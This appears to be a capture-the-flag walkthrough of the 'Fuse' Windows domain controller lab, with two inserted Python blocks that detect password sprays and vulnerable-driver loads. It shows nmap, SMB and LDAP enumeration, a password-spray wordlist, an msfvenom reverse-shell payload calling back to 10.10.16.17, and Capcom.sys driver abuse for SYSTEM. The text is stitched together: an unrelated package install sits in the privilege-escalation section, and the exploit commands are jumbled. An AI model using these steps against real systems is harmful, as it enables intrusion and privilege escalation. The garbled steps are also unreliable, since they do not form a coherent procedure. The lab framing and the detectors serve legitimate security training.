Fuse

Windows : Medium

Password spray attack, Windows API, Windows Privilege Escalation, WinRM.

Reconnaissance: NMAP

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.193  

53/tcp   open  domain       Simple DNS Plus

80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).

88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 09:50:13Z)

135/tcp  open  msrpc        Microsoft Windows RPC

139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn

389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)

445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)

464/tcp  open  kpasswd5?

593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0

636/tcp  open  tcpwrapped

3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)

3269/tcp open  tcpwrapped

Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-22T01:50:23-08:00
|_clock-skew: mean: 2h52m59s, deviation: 4h37m09s, median: 12m58s
| smb2-time: 
|   date: 2024-01-22T09:50:25
|_  start_date: 2024-01-22T09:03:33
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.193    

88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.193

53/tcp    open  domain       Simple DNS Plus
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-22 09:55:07Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49675/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  msrpc        Microsoft Windows RPC
49697/tcp open  msrpc        Microsoft Windows RPC
49714/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h52m58s, deviation: 4h37m08s, median: 12m57s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2024-01-22T01:55:58-08:00
| smb2-time: 
|   date: 2024-01-22T09:55:59
|_  start_date: 2024-01-22T09:03:33

nmap found twenty open TCP ports, which looks like a Windows domain controller. The LDAP script identified the domain as fabricorp.local. The SMB script identified the OS as Windows Server 2016 Standard 14393, which matches the IIS version of 10.

Enumeration: SMB Port 139/445/tcp

crackmapexec confirms the OS and domain:

┌──(kali💀kali)-[~]
└─$ crackmapexec smb 10.10.10.193
SMB         10.10.10.193    445    FUSE             [*] Windows Server 2016 Standard 14393 x64 (name:FUSE) (domain:fabricorp.local) (signing:True) (SMBv1:True)

smbmap shows that null auth doesn’t allow access:

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.193

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied}

┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.193 -u null

[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)

Enumeration: MSRPC - TCP 135/445

I’m able to connect with rpcclient, but don’t have permissions to access anything:

┌──(kali💀kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.193
rpcclient $> enumdomusers 
result was NT_STATUS_ACCESS_DENIED

Enumeration: LDAP - TCP 389

I’ll use ldapsearch to confirm the base domain of fabricorp.local with -s base namingcontexts:

┌──(kali💀kali)-[~]
└─$ ldapsearch -h 10.10.10.193 -x -s base namingcontexts

Looks like I need creds to get deeper:

┌──(kali💀kali)-[~]
└─$ ldapsearch -h 10.10.10.193 -x -b "DC=fabricorp,DC=local"

Shell as svc-print

Spray for Password: At this point, I don’t have a lot of options without credentials. I do have a handful of user names from these printer logs. The logs are also potentially a good source of target-specific words that might be used as a password. I’ll use them to build a wordlist and try to spray that against SMB to see if I can get anything.

Build Wordlist: I’ll create a wordlist from the webpage using cewl. The --with-numbers flag is a good one to use, especially here:

┌──(kali💀kali)-[~/Desktop]
└─$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers > wordlist

Because I didn’t specify a --depth, it will go two links away from the root page, which should be enough to get everything I want.
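Added example, not from the original writeup: the defender's view of the spray described above. Constructed failed-logon events (4625 NTLM failures and 4771 Kerberos pre-authentication failures, as a domain controller would record them) are grouped per source address, and a source that fails against many distinct accounts inside one window is flagged as a spray rather than as a brute force of a single account. The log format and every username other than svc-print are assumptions.

```python
"""Password-spray detector over constructed Windows logon-failure events."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (not real logs): event_id, timestamp, source IP, target user.
# 4625 = NTLM/local logon failure, 4771 = Kerberos pre-authentication failure.
SAMPLE_EVENTS = """\
4625 2024-01-22T09:50:13Z 10.10.16.17 user01
4625 2024-01-22T09:50:14Z 10.10.16.17 user02
4771 2024-01-22T09:50:15Z 10.10.16.17 user03
4625 2024-01-22T09:50:16Z 10.10.16.17 user04
4625 2024-01-22T09:50:17Z 10.10.16.17 administrator
4625 2024-01-22T09:50:18Z 10.10.16.17 svc-print
4625 2024-01-22T09:51:00Z 10.10.10.50 user05
4625 2024-01-22T09:52:00Z 10.10.10.50 user05
4625 2024-01-22T09:53:00Z 10.10.10.50 user05
"""

FAILURE_IDS = {"4625", "4771"}


def parse_events(text):
    """Yield (timestamp, source_ip, user) for failed-logon lines; other IDs are ignored."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[0] not in FAILURE_IDS:
            continue
        ts = datetime.strptime(parts[1], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, parts[2], parts[3].lower()


def detect_spray(text, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: sorted distinct users} for sources that failed against
    at least min_users distinct accounts inside any sliding window.
    One account hammered many times (brute force) does not trigger this rule."""
    by_src = defaultdict(list)
    for ts, src, user in parse_events(text):
        by_src[src].append((ts, user))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            users = {u for t, u in attempts[i:] if t - start <= window}
            if len(users) >= min_users:
                hits[src] = sorted(users)
                break
    return hits
```

A spray against SMB on the DC itself lands as 4625 on that host; a spray against Kerberos shows up as 4771, so both IDs are treated as failures.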

Privesc: svc-print –> SYSTEM

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Generate Payload: I could compile my own payload since I’ve already got Visual Studio open, but I’ll opt for a simple msfvenom payload. I’ll use windows/x64/shell_reverse_tcp to get a reverse shell I can handle with nc:

┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.17 LPORT=443 -f exe -o rev.exe

Now I’ll upload the two executables:

*Evil-WinRM* PS C:\Users\svc-print\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> ls

*Evil-WinRM* PS C:\programdata> upload rev.exe
Info: Uploading /home/kali/Desktop/rev.exe to C:\programdata\rev.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> ls
    Directory: C:\programdata
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/29/2020   5:25 PM                Hewlett-Packard
d---s-         6/1/2020   3:18 AM                Microsoft
d-----        5/29/2020   4:46 PM                Package Cache
d-----        5/26/2020  10:36 PM                regid.1991-06.com.microsoft
d-----        7/16/2016   6:18 AM                SoftwareDistribution
d-----       11/20/2016   6:19 PM                USOPrivate
d-----       11/20/2016   6:19 PM                USOShared
d-----        5/29/2020   4:46 PM                VMware
-a----        1/22/2024   5:38 AM           7168 rev.exe
┌──(kali💀kali)-[~]
└─$ cd Downloads

┌──(kali💀kali)-[~/Downloads]
└─$ ls
 code_1.85.2-1705561292_amd64.deb

┌──(kali💀kali)-[~/Downloads]
└─$ sudo apt install ./code_1.85.2-1705561292_amd64.deb

ExploitCapcom: This is a standalone exploit for a vulnerable feature in Capcom.sys. The feature is exposed through an IOCTL and executes an arbitrary user-supplied function pointer after disabling SMEP. This exploit simply abuses the feature to perform token stealing to get SYSTEM privileges, and then launches the command prompt with the elevated privilege.

*Evil-WinRM* PS C:\programdata> upload /root/Downloads/Capcom.sys .
upload /root/Downloads/ExploitCapcom.exe .

upload C:\Users\Administrator\Desktop\ExploitCapcom.exe

.\eoploaddriver.cpp System\CurrentControlSet\MyService C:\programdata\capcom.sys
.\ExploitCapcom.exe

.\EoPLoadDriver.exe System\CurrentControlSet\CapcomService c:\tmp-pers\Capcom.sys
.\ExploitCapcom2.exe
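Added example, not from the original writeup or the ExploitCapcom project: the detection side of the privilege escalation above. Constructed Sysmon-style events (ID 6 driver load, ID 13 registry value set) are checked for a driver loaded from outside the system driver directory, a driver file name the page identifies as exploitable, and a service definition written under a user hive, which is the path a loader run with SeLoadDriverPrivilege by a non-admin uses. The line format and sample values are assumptions.

```python
"""Flag kernel-driver loads that match the SeLoadDriverPrivilege abuse described above.
Input is constructed, Sysmon-like 'EID key=value ...' lines, not real telemetry."""
import re

# Constructed sample telemetry (not captured from a real host):
#   EID 6  = Sysmon DriverLoad; EID 13 = Sysmon RegistryEvent (value set).
SAMPLE_LOG = """\
13 TargetObject=HKU\\S-1-5-21-1\\System\\CurrentControlSet\\CapcomService\\ImagePath Details=\\??\\C:\\programdata\\capcom.sys
6 ImageLoaded=C:\\programdata\\capcom.sys Signed=true Signature=CAPCOM Co.,Ltd.
6 ImageLoaded=C:\\Windows\\System32\\drivers\\tcpip.sys Signed=true Signature=Microsoft Windows
13 TargetObject=HKLM\\System\\CurrentControlSet\\Services\\tcpip\\Start Details=DWORD (0x00000001)
"""

TRUSTED_DRIVER_DIR = r"c:\windows\system32\drivers"
# Driver file names the writeup identifies as exploitable; in production extend this
# from a maintained list such as Microsoft's vulnerable driver blocklist.
KNOWN_VULNERABLE = {"capcom.sys"}


def parse_line(line):
    """Split 'EID key=value key=value' into (eid, dict); values may contain spaces."""
    eid, _, rest = line.partition(" ")
    fields = dict(re.findall(r"(\w+)=(.*?)(?=\s\w+=|$)", rest))
    return eid, fields


def driver_alerts(text):
    """Return one (rule, detail) tuple per suspicious event, in log order."""
    alerts = []
    for line in text.splitlines():
        eid, f = parse_line(line)
        if eid == "6":
            path = f["ImageLoaded"].lower()
            if path.rsplit("\\", 1)[-1] in KNOWN_VULNERABLE:
                alerts.append(("known-vulnerable driver loaded", f["ImageLoaded"]))
            elif not path.startswith(TRUSTED_DRIVER_DIR):
                alerts.append(("driver loaded outside System32\\drivers", f["ImageLoaded"]))
        elif eid == "13":
            target = f["TargetObject"].lower()
            # A service ImagePath under HKU (a user hive) is how a non-admin holding
            # SeLoadDriverPrivilege hands NtLoadDriver a driver path it could write to.
            if target.startswith("hku\\") and target.endswith("\\imagepath"):
                alerts.append(("kernel service defined in user hive", f["TargetObject"]))
    return alerts
```

The durable fix is removing SeLoadDriverPrivilege from accounts like the service account shown in whoami /priv above; these rules catch the case where it is still granted.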

Last updated